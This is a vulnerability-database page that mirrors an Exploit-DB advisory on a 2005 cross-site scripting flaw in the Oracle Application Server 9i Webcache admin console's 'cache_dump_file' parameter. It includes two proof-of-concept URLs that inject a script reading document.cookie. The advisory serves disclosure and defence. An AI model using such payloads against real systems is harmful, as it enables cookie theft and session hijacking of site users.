Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbAlexander KornbrustEDB-ID:25562
HistoryApr 28, 2005 - 12:00 a.m.

Oracle Application Server 9i - Webcache Cache_dump_file Cross-Site Scripting

2005-04-2800:00:00
Alexander Kornbrust
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

JSON
source : https://www.securityfocus.com/bid/13421/info

A remote cross-site scripting vulnerability affects the Oracle Application Server 9i Webcache administration console. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.

The issue affects the 'cache_dump_file' parameter of the 'webcacheadmin' script. 

http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
http://administrator:[email protected]:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>

Related

cvelist 1
cve 1
exploitdb 1
nvd 1
nessus 1
cvelist
cvelist
CVE-2005-1381
2005-05-02 04:00:00
cve
cve
CVE-2005-1381
2005-05-03 04:00:00
exploitdb
exploitdb
Oracle Application Server 9i - Webcache PartialPageErrorPage Cross-Site Scripting
2005-04-28 00:00:00
nvd
nvd
CVE-2005-1381
2005-05-03 04:00:00
nessus
nessus
Oracle Application Server 9i Webcache < 9.0.4.0 Multiple Vulnerabilities
2005-05-02 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:25562
cvelist1cve1exploitdb1nvd1nessus1